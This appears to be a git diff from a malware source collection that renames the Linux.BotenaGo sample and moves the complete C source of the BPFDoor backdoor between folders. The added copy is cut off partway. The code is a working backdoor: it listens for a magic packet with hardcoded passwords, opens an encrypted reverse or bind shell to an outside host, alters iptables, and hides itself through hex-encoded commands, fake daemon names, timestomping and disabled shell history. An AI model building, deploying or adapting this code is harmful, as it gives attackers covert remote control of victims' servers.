diff --git a/Leaks/Linux/Linux.BotenaGo.go b/Linux/Linux.BotenaGo.go
similarity index 100%
rename from Leaks/Linux/Linux.BotenaGo.go
rename to Linux/Linux.BotenaGo.go
diff --git a/Leaks/Linux/Linux.RedMenshenBPFDoor.c b/Linux/Linux.RedMenshenBPFDoor.c
similarity index 96%
rename from Leaks/Linux/Linux.RedMenshenBPFDoor.c
rename to Linux/Linux.RedMenshenBPFDoor.c
index 88805a7ff..8ba6d209c 100644
--- a/Leaks/Linux/Linux.RedMenshenBPFDoor.c
+++ b/Linux/Linux.RedMenshenBPFDoor.c
@@ -1,900 +1,900 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#ifndef PR_SET_NAME -#define PR_SET_NAME 15 -#endif - -extern char **environ; - -#define __SID ('S' << 8) -#define I_PUSH (__SID | 2) - -struct sniff_ip { - unsigned char ip_vhl; - unsigned char ip_tos; - unsigned short int ip_len; - unsigned short int ip_id; - unsigned short int ip_off; - #define IP_RF 0x8000 - #define IP_DF 0x4000 - #define IP_MF 0x2000 - #define IP_OFFMASK 0x1fff - unsigned char ip_ttl; - unsigned char ip_p; - unsigned short int ip_sum; - struct in_addr ip_src,ip_dst; -}; -#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f) -#define IP_V(ip) (((ip)->ip_vhl) >> 4) - -typedef unsigned int tcp_seq; -struct sniff_tcp { - unsigned short int th_sport; - unsigned short int th_dport; - tcp_seq th_seq; - tcp_seq th_ack; - unsigned char th_offx2; - #define TH_OFF(th) (((th)->th_offx2 & 0xf0) >> 4) - unsigned char th_flags; - #define TH_FIN 0x01 - #define TH_SYN 0x02 - #define TH_RST 0x04 - #define TH_PUSH 0x08 - #define TH_ACK 0x10 - #define TH_URG 0x20 - #define TH_ECE 0x40 - #define TH_CWR 0x80 - #define TH_FLAGS (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR) - unsigned short int th_win; - unsigned short int th_sum; - unsigned short int th_urp; -} __attribute__ ((packed)); - -struct sniff_udp { - uint16_t uh_sport; - uint16_t uh_dport; - uint16_t uh_ulen; - uint16_t uh_sum; -} __attribute__ ((packed)); - -struct magic_packet{ - unsigned int flag; - in_addr_t ip; - unsigned short port; - char pass[14]; -} __attribute__ ((packed)); - -#ifndef uchar -#define uchar unsigned char -#endif - -typedef struct { - uchar state[256]; - uchar x, y; -} rc4_ctx; - -extern char *ptsname(int); -extern int grantpt(int fd); -extern int unlockpt(int fd); -extern int ioctl (int __fd, unsigned long int __request, 
...) __THROW; - -#define TIOCSCTTY 0x540E -#define TIOCGWINSZ 0x5413 -#define TIOCSWINSZ 0x5414 -#define ECHAR 0x0b - -#define BUF 32768 - -struct config { - char stime[4]; - char etime[4]; - char mask[512]; - char pass[14]; - char pass2[14]; -} __attribute__ ((packed)); - -struct config cfg; -int pty, tty; -int godpid; -char pid_path[50]; - -int shell(int, char *, char *); -void getshell(char *ip, int); - -char *argv0 = NULL; - -rc4_ctx crypt_ctx, decrypt_ctx; - -void xchg(uchar *a, uchar *b) -{ - uchar c = *a; - *a = *b; - *b = c; -} - -void rc4_init (uchar *key, int len, rc4_ctx *ctx) -{ - uchar index1, index2; - uchar *state = ctx->state; - uchar i; - - i = 0; - do { - state[i] = i; - i++; - } while (i); - - ctx->x = ctx->y = 0; - index1 = index2 = 0; - do { - index2 = key[index1] + state[i] + index2; - xchg(&state[i], &state[index2]); - index1++; - if (index1 >= len) - index1 = 0; - i++; - } while (i); -} - -void rc4 (uchar *data, int len, rc4_ctx *ctx) -{ - uchar *state = ctx->state; - uchar x = ctx->x; - uchar y = ctx->y; - int i; - - for (i = 0; i < len; i++) { - uchar xor; - - x++; - y = state[x] + y; - xchg(&state[x], &state[y]); - - xor = state[x] + state[y]; - data[i] ^= state[xor]; - } - - ctx->x = x; - ctx->y = y; -} - -int cwrite(int fd, void *buf, int count) -{ - uchar *tmp; - int ret; - - if (!count) - return 0; - tmp = malloc(count); - if (!tmp) - return 0; - memcpy(tmp, buf, count); - rc4(tmp, count, &crypt_ctx); - ret = write(fd, tmp, count); - free(tmp); - return ret; -} - -int cread(int fd, void *buf, int count) -{ - int i; - - if (!count) - return 0; - i = read(fd, buf, count); - - if (i > 0) - rc4(buf, i, &decrypt_ctx); - return i; -} - -static void remove_pid(char *pp) -{ - unlink(pp); -} - -static void setup_time(char *file) -{ - struct timeval tv[2]; - - tv[0].tv_sec = 1225394236; - tv[0].tv_usec = 0; - - tv[1].tv_sec = 1225394236; - tv[1].tv_usec = 0; - - utimes(file, tv); -} -static void terminate(void) -{ - if (getpid() == godpid) - 
remove_pid(pid_path); - - _exit(EXIT_SUCCESS); -} - -static void on_terminate(int signo) -{ - terminate(); -} -static void init_signal(void) -{ - atexit(terminate); - signal(SIGTERM, on_terminate); - return; -} - -void sig_child(int i) -{ - signal(SIGCHLD, sig_child); - waitpid(-1, NULL, WNOHANG); -} - -int ptym_open(char *pts_name) -{ - char *ptr; - int fd; - - strcpy(pts_name,"/dev/ptmx"); - if ((fd = open(pts_name,O_RDWR)) < 0) { - return -1; - } - - if (grantpt(fd) < 0) { - close(fd); - return -2; - } - - if (unlockpt(fd) < 0) { - close(fd); - return -3; - } - - if ((ptr = ptsname(fd)) == NULL) { - close(fd); - return -4; - } - - strcpy(pts_name,ptr); - - return fd; -} - -int ptys_open(int fd,char *pts_name) -{ - int fds; - - if ((fds = open(pts_name,O_RDWR)) < 0) { - close(fd); - return -5; - } - - - if (ioctl(fds,I_PUSH,"ptem") < 0) { - return fds; - } - - if (ioctl(fds,I_PUSH,"ldterm") < 0) { - return fds; - } - - if (ioctl(fds,I_PUSH,"ttcompat") < 0) { - return fds; - } - - return fds; -} - -int open_tty() -{ - char pts_name[20]; - - pty = ptym_open(pts_name); - - tty = ptys_open(pty,pts_name); - - if (pty >= 0 && tty >=0 ) - return 1; - return 0; -} - -int try_link(in_addr_t ip, unsigned short port) -{ - struct sockaddr_in serv_addr; - int sock; - - bzero(&serv_addr, sizeof(serv_addr)); - - serv_addr.sin_addr.s_addr = ip; - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { - return -1; - } - - serv_addr.sin_family = AF_INET; - serv_addr.sin_port = port; - - if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(struct sockaddr)) == -1 ) { - close(sock); - return -1; - } - return sock; -} - -int mon(in_addr_t ip, unsigned short port) -{ - struct sockaddr_in remote; - int sock; - int s_len; - - bzero(&remote, sizeof(remote)); - if ((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < -1) { - return -1; - } - remote.sin_family = AF_INET; - remote.sin_port = port; - remote.sin_addr.s_addr = ip; - - if ((s_len = sendto(sock, "1", 1, 0, (struct sockaddr 
*)&remote, sizeof(struct sockaddr))) < 0) { - close(sock); - return -1; - } - close(sock); - return s_len; -} - -int set_proc_name(int argc, char **argv, char *new) -{ - size_t size = 0; - int i; - char *raw = NULL; - char *last = NULL; - - argv0 = argv[0]; - - for (i = 0; environ[i]; i++) - size += strlen(environ[i]) + 1; - - raw = (char *) malloc(size); - if (NULL == raw) - return -1; - - for (i = 0; environ[i]; i++) - { - memcpy(raw, environ[i], strlen(environ[i]) + 1); - environ[i] = raw; - raw += strlen(environ[i]) + 1; - } - - last = argv[0]; - - for (i = 0; i < argc; i++) - last += strlen(argv[i]) + 1; - for (i = 0; environ[i]; i++) - last += strlen(environ[i]) + 1; - - memset(argv0, 0x00, last - argv0); - strncpy(argv0, new, last - argv0); - - prctl(PR_SET_NAME, (unsigned long) new); - return 0; -} -int to_open(char *name, char *tmp) -{ - char cmd[256] = {0}; - char fmt[] = { - 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x72, 0x6d, 0x20, 0x2d, 0x66, - 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, 0x2f, - 0x25, 0x73, 0x3b, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x63, 0x70, - 0x20, 0x25, 0x73, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, - 0x68, 0x6d, 0x2f, 0x25, 0x73, 0x20, 0x26, 0x26, 0x20, 0x2f, - 0x62, 0x69, 0x6e, 0x2f, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, - 0x37, 0x35, 0x35, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, - 0x68, 0x6d, 0x2f, 0x25, 0x73, 0x20, 0x26, 0x26, 0x20, 0x2f, - 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, 0x2f, 0x25, 0x73, - 0x20, 0x2d, 0x2d, 0x69, 0x6e, 0x69, 0x74, 0x20, 0x26, 0x26, - 0x20, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x72, 0x6d, 0x20, 0x2d, - 0x66, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, - 0x2f, 0x25, 0x73, 0x00}; // /bin/rm -f /dev/shm/%s;/bin/cp %s /dev/shm/%s && /bin/chmod 755 /dev/shm/%s && /dev/shm/%s --init && /bin/rm -f /dev/shm/%s - - snprintf(cmd, sizeof(cmd), fmt, tmp, name, tmp, tmp, tmp, tmp); - system(cmd); - sleep(2); - if (access(pid_path, R_OK) == 0) - return 0; - return 1; -} - -int logon(const char *hash) -{ - int x = 0; 
- x = memcmp(cfg.pass, hash, strlen(cfg.pass)); - if (x == 0) - return 0; - x = memcmp(cfg.pass2, hash, strlen(cfg.pass2)); - if (x == 0) - return 1; - - return 2; -} - -void packet_loop() -{ - int sock, r_len, pid, scli, size_ip, size_tcp; - socklen_t psize; - uchar buff[512]; - const struct sniff_ip *ip; - const struct sniff_tcp *tcp; - struct magic_packet *mp; - const struct sniff_udp *udp; - in_addr_t bip; - char *pbuff = NULL; - - // - // Filter Options Build Filter Struct - // - - struct sock_fprog filter; - struct sock_filter bpf_code[] = { - { 0x28, 0, 0, 0x0000000c }, - { 0x15, 0, 27, 0x00000800 }, - { 0x30, 0, 0, 0x00000017 }, - { 0x15, 0, 5, 0x00000011 }, - { 0x28, 0, 0, 0x00000014 }, - { 0x45, 23, 0, 0x00001fff }, - { 0xb1, 0, 0, 0x0000000e }, - { 0x48, 0, 0, 0x00000016 }, - { 0x15, 19, 20, 0x00007255 }, - { 0x15, 0, 7, 0x00000001 }, - { 0x28, 0, 0, 0x00000014 }, - { 0x45, 17, 0, 0x00001fff }, - { 0xb1, 0, 0, 0x0000000e }, - { 0x48, 0, 0, 0x00000016 }, - { 0x15, 0, 14, 0x00007255 }, - { 0x50, 0, 0, 0x0000000e }, - { 0x15, 11, 12, 0x00000008 }, - { 0x15, 0, 11, 0x00000006 }, - { 0x28, 0, 0, 0x00000014 }, - { 0x45, 9, 0, 0x00001fff }, - { 0xb1, 0, 0, 0x0000000e }, - { 0x50, 0, 0, 0x0000001a }, - { 0x54, 0, 0, 0x000000f0 }, - { 0x74, 0, 0, 0x00000002 }, - { 0xc, 0, 0, 0x00000000 }, - { 0x7, 0, 0, 0x00000000 }, - { 0x48, 0, 0, 0x0000000e }, - { 0x15, 0, 1, 0x00005293 }, - { 0x6, 0, 0, 0x0000ffff }, - { 0x6, 0, 0, 0x00000000 }, - }; - - filter.len = sizeof(bpf_code)/sizeof(bpf_code[0]); - filter.filter = bpf_code; - - // - // Build a rawsocket that binds the NIC to receive Ethernet frames - // - - if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP))) < 1) - return; - - // - // Set a packet filter - // - - if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_FILTER, &filter, sizeof(filter)) == -1) { - return; - } - - - // - // Loop to Read Packets in 512 Chunks - // - - - while (1) { - memset(buff, 0, 512); - psize = 0; - r_len = recvfrom(sock, buff, 512, 0x0, 
NULL, NULL); - - ip = (struct sniff_ip *)(buff+14); - size_ip = IP_HL(ip)*4; - if (size_ip < 20) continue; - - // determine protocl from packet (offset 14) - switch(ip->ip_p) { - case IPPROTO_TCP: - tcp = (struct sniff_tcp*)(buff+14+size_ip); - size_tcp = TH_OFF(tcp)*4; - mp = (struct magic_packet *)(buff+14+size_ip+size_tcp); - break; - case IPPROTO_UDP: - udp = (struct sniff_udp *)(ip+1); - mp = (struct magic_packet *)(udp+1); - break; - case IPPROTO_ICMP: - pbuff = (char *)(ip+1); - mp = (struct magic_packet *)(pbuff+8); - break; - default: - break; - } - - // if magic packet is set process - - if (mp) { - if (mp->ip == INADDR_NONE) - bip = ip->ip_src.s_addr; - else - bip = mp->ip; - - pid = fork(); - if (pid) { - waitpid(pid, NULL, WNOHANG); - } - else { - int cmp = 0; - char sip[20] = {0}; - char pname[] = {0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x69, 0x62, 0x65, 0x78, 0x65, 0x63, 0x2f, 0x70, 0x6f, 0x73, 0x74, 0x66, 0x69, 0x78, 0x2f, 0x6d, 0x61, 0x73, 0x74, 0x65, - 0x72, 0x00}; // /usr/libexec/postfix/master - - if (fork()) exit(0); - chdir("/"); - setsid(); - signal(SIGHUP, SIG_DFL); - memset(argv0, 0, strlen(argv0)); - strcpy(argv0, pname); // sets process name (/usr/libexec/postfix/master) - prctl(PR_SET_NAME, (unsigned long) pname); - - rc4_init(mp->pass, strlen(mp->pass), &crypt_ctx); - rc4_init(mp->pass, strlen(mp->pass), &decrypt_ctx); - - cmp = logon(mp->pass); - switch(cmp) { - case 1: - strcpy(sip, inet_ntoa(ip->ip_src)); - getshell(sip, ntohs(tcp->th_dport)); - break; - case 0: - scli = try_link(bip, mp->port); - if (scli > 0) - shell(scli, NULL, NULL); - break; - case 2: - mon(bip, mp->port); - break; - } - exit(0); - } - } - - } - close(sock); -} - -int b(int *p) -{ - int port; - struct sockaddr_in my_addr; - int sock_fd; - int flag = 1; - - if( (sock_fd = socket(AF_INET,SOCK_STREAM,0)) == -1 ){ - return -1; - } - - setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, (char*)&flag,sizeof(flag)); - - my_addr.sin_family = AF_INET; - my_addr.sin_addr.s_addr = 0; 
- - for (port = 42391; port < 43391; port++) { - my_addr.sin_port = htons(port); - if( bind(sock_fd,(struct sockaddr *)&my_addr,sizeof(struct sockaddr)) == -1 ){ - continue; - } - if( listen(sock_fd,1) == 0 ) { - *p = port; - return sock_fd; - } - close(sock_fd); - } - return -1; -} - -int w(int sock) -{ - socklen_t size; - struct sockaddr_in remote_addr; - int sock_id; - - size = sizeof(struct sockaddr_in); - if( (sock_id = accept(sock,(struct sockaddr *)&remote_addr, &size)) == -1 ){ - return -1; - } - - close(sock); - return sock_id; - -} - -void getshell(char *ip, int fromport) -{ - int sock, sockfd, toport; - char cmd[512] = {0}, rcmd[512] = {0}, dcmd[512] = {0}; - char cmdfmt[] = { - 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, - 0x65, 0x73, 0x20, 0x2d, 0x74, 0x20, 0x6e, 0x61, 0x74, 0x20, 0x2d, 0x41, - 0x20, 0x50, 0x52, 0x45, 0x52, 0x4f, 0x55, 0x54, 0x49, 0x4e, 0x47, 0x20, - 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, - 0x20, 0x2d, 0x2d, 0x64, 0x70, 0x6f, 0x72, 0x74, 0x20, 0x25, 0x64, 0x20, - 0x2d, 0x6a, 0x20, 0x52, 0x45, 0x44, 0x49, 0x52, 0x45, 0x43, 0x54, 0x20, - 0x2d, 0x2d, 0x74, 0x6f, 0x2d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x20, 0x25, - 0x64, 0x00}; // /sbin/iptables -t nat -A PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d - char rcmdfmt[] = { - 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, - 0x65, 0x73, 0x20, 0x2d, 0x74, 0x20, 0x6e, 0x61, 0x74, 0x20, 0x2d, 0x44, - 0x20, 0x50, 0x52, 0x45, 0x52, 0x4f, 0x55, 0x54, 0x49, 0x4e, 0x47, 0x20, - 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, - 0x20, 0x2d, 0x2d, 0x64, 0x70, 0x6f, 0x72, 0x74, 0x20, 0x25, 0x64, 0x20, - 0x2d, 0x6a, 0x20, 0x52, 0x45, 0x44, 0x49, 0x52, 0x45, 0x43, 0x54, 0x20, - 0x2d, 0x2d, 0x74, 0x6f, 0x2d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x20, 0x25, - 0x64, 0x00}; // /sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d - char inputfmt[] = { - 0x2f, 0x73, 
0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, - 0x65, 0x73, 0x20, 0x2d, 0x49, 0x20, 0x49, 0x4e, 0x50, 0x55, 0x54, 0x20, - 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, - 0x20, 0x2d, 0x6a, 0x20, 0x41, 0x43, 0x43, 0x45, 0x50, 0x54, 0x00}; // /sbin/iptables -I INPUT -p tcp -s %s -j ACCEPT - char dinputfmt[] = { - 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, - 0x65, 0x73, 0x20, 0x2d, 0x44, 0x20, 0x49, 0x4e, 0x50, 0x55, 0x54, 0x20, - 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, - 0x20, 0x2d, 0x6a, 0x20, 0x41, 0x43, 0x43, 0x45, 0x50, 0x54, 0x00}; // /sbin/iptables -D INPUT -p tcp -s %s -j ACCEPT - - sockfd = b(&toport); // looks like it selects random ephemral port here - if (sockfd == -1) return; - - snprintf(cmd, sizeof(cmd), inputfmt, ip); - snprintf(dcmd, sizeof(dcmd), dinputfmt, ip); - system(cmd); // executes /sbin/iptables -I INPUT -p tcp -s %s -j ACCEPT - sleep(1); - memset(cmd, 0, sizeof(cmd)); - snprintf(cmd, sizeof(cmd), cmdfmt, ip, fromport, toport); - snprintf(rcmd, sizeof(rcmd), rcmdfmt, ip, fromport, toport); - system(cmd); // executes /sbin/iptables -t nat -A PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d - sleep(1); - sock = w(sockfd); // creates a sock that listens on port specified earlier - if( sock < 0 ){ - close(sock); - return; - } - - // - // passes sock and - // rcmd = /sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d - // dcmd = /sbin/iptables -D INPUT -p tcp -s %s -j ACCEPT - // - // - - shell(sock, rcmd, dcmd); - close(sock); -} - -int shell(int sock, char *rcmd, char *dcmd) -{ - int subshell; - fd_set fds; - char buf[BUF]; - char argx[] = { - 0x71, 0x6d, 0x67, 0x72, 0x20, 0x2d, 0x6c, 0x20, 0x2d, 0x74, - 0x20, 0x66, 0x69, 0x66, 0x6f, 0x20, 0x2d, 0x75, 0x00}; // qmgr -l -t fifo -u - char *argvv[] = {argx, NULL, NULL}; - #define MAXENV 256 - #define ENVLEN 256 - char *envp[MAXENV]; - char sh[] = {0x2f, 
0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00}; // /bin/sh - int ret; - char home[] = {0x48, 0x4f, 0x4d, 0x45, 0x3d, 0x2f, 0x74, 0x6d, 0x70, 0x00}; // HOME=/tmp - char ps[] = { - 0x50, 0x53, 0x31, 0x3d, 0x5b, 0x5c, 0x75, 0x40, 0x5c, 0x68, 0x20, - 0x5c, 0x57, 0x5d, 0x5c, 0x5c, 0x24, 0x20, 0x00}; // PS1=[\u@\h \W]\\$ - char histfile[] = { - 0x48, 0x49, 0x53, 0x54, 0x46, 0x49, 0x4c, 0x45, 0x3d, 0x2f, 0x64, - 0x65, 0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x00}; // HISTFILE=/dev/null - char mshist[] = { - 0x4d, 0x59, 0x53, 0x51, 0x4c, 0x5f, 0x48, 0x49, 0x53, 0x54, 0x46, - 0x49, 0x4c, 0x45, 0x3d, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x6e, 0x75, - 0x6c, 0x6c, 0x00}; // MYSQL_HISTFILE=/dev/null - char ipath[] = { - 0x50, 0x41, 0x54, 0x48, 0x3d, 0x2f, 0x62, 0x69, 0x6e, - 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6b, 0x65, 0x72, 0x62, 0x65, - 0x72, 0x6f, 0x73, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, - 0x73, 0x72, 0x2f, 0x6b, 0x65, 0x72, 0x62, 0x65, 0x72, 0x6f, 0x73, - 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, - 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, - 0x73, 0x72, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, - 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x2f, 0x62, 0x69, 0x6e, - 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, - 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, - 0x58, 0x31, 0x31, 0x52, 0x36, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2e, - 0x2f, 0x62, 0x69, 0x6e, 0x00}; // PATH=/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin:./bin - char term[] = "vt100"; - - envp[0] = home; - envp[1] = ps; - envp[2] = histfile; - envp[3] = mshist; - envp[4] = ipath; - envp[5] = term; - envp[6] = NULL; - - if (rcmd != NULL) - system(rcmd); - if (dcmd != NULL) - system(dcmd); - write(sock, "3458", 4); - if (!open_tty()) { - if (!fork()) { - dup2(sock, 0); - dup2(sock, 1); - dup2(sock, 2); - execve(sh, argvv, envp); - } - close(sock); - return 0; 
- } - - subshell = fork(); - if (subshell == 0) { - close(pty); - ioctl(tty, TIOCSCTTY); - close(sock); - dup2(tty, 0); - dup2(tty, 1); - dup2(tty, 2); - close(tty); - execve(sh, argvv, envp); - } - close(tty); - - while (1) { - FD_ZERO(&fds); - FD_SET(pty, &fds); - FD_SET(sock, &fds); - if (select((pty > sock) ? (pty+1) : (sock+1), - &fds, NULL, NULL, NULL) < 0) - { - break; - } - if (FD_ISSET(pty, &fds)) { - int count; - count = read(pty, buf, BUF); - if (count <= 0) break; - if (cwrite(sock, buf, count) <= 0) break; - } - if (FD_ISSET(sock, &fds)) { - int count; - unsigned char *p, *d; - d = (unsigned char *)buf; - count = cread(sock, buf, BUF); - if (count <= 0) break; - - p = memchr(buf, ECHAR, count); - if (p) { - unsigned char wb[5]; - int rlen = count - ((long) p - (long) buf); - struct winsize ws; - - if (rlen > 5) rlen = 5; - memcpy(wb, p, rlen); - if (rlen < 5) { - ret = cread(sock, &wb[rlen], 5 - rlen); - } - - ws.ws_xpixel = ws.ws_ypixel = 0; - ws.ws_col = (wb[1] << 8) + wb[2]; - ws.ws_row = (wb[3] << 8) + wb[4]; - ioctl(pty, TIOCSWINSZ, &ws); - kill(0, SIGWINCH); - - ret = write(pty, buf, (long) p - (long) buf); - rlen = ((long) buf + count) - ((long)p+5); - if (rlen > 0) ret = write(pty, p+5, rlen); - } else - if (write(pty, d, count) <= 0) break; - } - } - close(sock); - close(pty); - waitpid(subshell, NULL, 0); - vhangup(); - exit(0); -} - -int main(int argc, char *argv[]) -{ - char hash[] = {0x6a, 0x75, 0x73, 0x74, 0x66, 0x6f, 0x72, 0x66, 0x75, 0x6e, 0x00}; // justforfun - char hash2[]= {0x73, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x00}; // socket - char *self[] = { - "/sbin/udevd -d", - "/sbin/mingetty /dev/tty7", - "/usr/sbin/console-kit-daemon --no-daemon", - "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event", - "dbus-daemon --system", - "hald-runner", - "pickup -l -t fifo -u", - "avahi-daemon: chroot helper", - "/sbin/auditd -n", - "/usr/lib/systemd/systemd-journald" - }; - - pid_path[0] = 0x2f; pid_path[1] = 0x76; pid_path[2] = 
0x61; - pid_path[3] = 0x72; pid_path[4] = 0x2f; pid_path[5] = 0x72; - pid_path[6] = 0x75; pid_path[7] = 0x6e; pid_path[8] = 0x2f; - pid_path[9] = 0x68; pid_path[10] = 0x61; pid_path[11] = 0x6c; - pid_path[12] = 0x64; pid_path[13] = 0x72; pid_path[14] = 0x75; - pid_path[15] = 0x6e; pid_path[16] = 0x64; pid_path[17] = 0x2e; - pid_path[18] = 0x70; pid_path[19] = 0x69; pid_path[20] = 0x64; - pid_path[21] = 0x00; // /var/run/haldrund.pid - - if (access(pid_path, R_OK) == 0) { - exit(0); - } - - if (getuid() != 0) { - return 0; - } - - if (argc == 1) { - if (to_open(argv[0], "kdmtmpflush") == 0) - _exit(0); - _exit(-1); - } - - bzero(&cfg, sizeof(cfg)); - - srand((unsigned)time(NULL)); - strcpy(cfg.mask, self[rand()%10]); - strcpy(cfg.pass, hash); - strcpy(cfg.pass2, hash2); - - setup_time(argv[0]); - - set_proc_name(argc, argv, cfg.mask); - - if (fork()) exit(0); - init_signal(); - signal(SIGCHLD, sig_child); - godpid = getpid(); - - close(open(pid_path, O_CREAT|O_WRONLY, 0644)); - - signal(SIGCHLD,SIG_IGN); - setsid(); - packet_loop(); - return 0; +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifndef PR_SET_NAME +#define PR_SET_NAME 15 +#endif + +extern char **environ; + +#define __SID ('S' << 8) +#define I_PUSH (__SID | 2) + +struct sniff_ip { + unsigned char ip_vhl; + unsigned char ip_tos; + unsigned short int ip_len; + unsigned short int ip_id; + unsigned short int ip_off; + #define IP_RF 0x8000 + #define IP_DF 0x4000 + #define IP_MF 0x2000 + #define IP_OFFMASK 0x1fff + unsigned char ip_ttl; + unsigned char ip_p; + unsigned short int ip_sum; + struct in_addr ip_src,ip_dst; +}; +#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f) +#define IP_V(ip) (((ip)->ip_vhl) >> 4) + +typedef unsigned int tcp_seq; +struct sniff_tcp { + unsigned short int th_sport; + unsigned short int 
th_dport; + tcp_seq th_seq; + tcp_seq th_ack; + unsigned char th_offx2; + #define TH_OFF(th) (((th)->th_offx2 & 0xf0) >> 4) + unsigned char th_flags; + #define TH_FIN 0x01 + #define TH_SYN 0x02 + #define TH_RST 0x04 + #define TH_PUSH 0x08 + #define TH_ACK 0x10 + #define TH_URG 0x20 + #define TH_ECE 0x40 + #define TH_CWR 0x80 + #define TH_FLAGS (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR) + unsigned short int th_win; + unsigned short int th_sum; + unsigned short int th_urp; +} __attribute__ ((packed)); + +struct sniff_udp { + uint16_t uh_sport; + uint16_t uh_dport; + uint16_t uh_ulen; + uint16_t uh_sum; +} __attribute__ ((packed)); + +struct magic_packet{ + unsigned int flag; + in_addr_t ip; + unsigned short port; + char pass[14]; +} __attribute__ ((packed)); + +#ifndef uchar +#define uchar unsigned char +#endif + +typedef struct { + uchar state[256]; + uchar x, y; +} rc4_ctx; + +extern char *ptsname(int); +extern int grantpt(int fd); +extern int unlockpt(int fd); +extern int ioctl (int __fd, unsigned long int __request, ...) 
__THROW; + +#define TIOCSCTTY 0x540E +#define TIOCGWINSZ 0x5413 +#define TIOCSWINSZ 0x5414 +#define ECHAR 0x0b + +#define BUF 32768 + +struct config { + char stime[4]; + char etime[4]; + char mask[512]; + char pass[14]; + char pass2[14]; +} __attribute__ ((packed)); + +struct config cfg; +int pty, tty; +int godpid; +char pid_path[50]; + +int shell(int, char *, char *); +void getshell(char *ip, int); + +char *argv0 = NULL; + +rc4_ctx crypt_ctx, decrypt_ctx; + +void xchg(uchar *a, uchar *b) +{ + uchar c = *a; + *a = *b; + *b = c; +} + +void rc4_init (uchar *key, int len, rc4_ctx *ctx) +{ + uchar index1, index2; + uchar *state = ctx->state; + uchar i; + + i = 0; + do { + state[i] = i; + i++; + } while (i); + + ctx->x = ctx->y = 0; + index1 = index2 = 0; + do { + index2 = key[index1] + state[i] + index2; + xchg(&state[i], &state[index2]); + index1++; + if (index1 >= len) + index1 = 0; + i++; + } while (i); +} + +void rc4 (uchar *data, int len, rc4_ctx *ctx) +{ + uchar *state = ctx->state; + uchar x = ctx->x; + uchar y = ctx->y; + int i; + + for (i = 0; i < len; i++) { + uchar xor; + + x++; + y = state[x] + y; + xchg(&state[x], &state[y]); + + xor = state[x] + state[y]; + data[i] ^= state[xor]; + } + + ctx->x = x; + ctx->y = y; +} + +int cwrite(int fd, void *buf, int count) +{ + uchar *tmp; + int ret; + + if (!count) + return 0; + tmp = malloc(count); + if (!tmp) + return 0; + memcpy(tmp, buf, count); + rc4(tmp, count, &crypt_ctx); + ret = 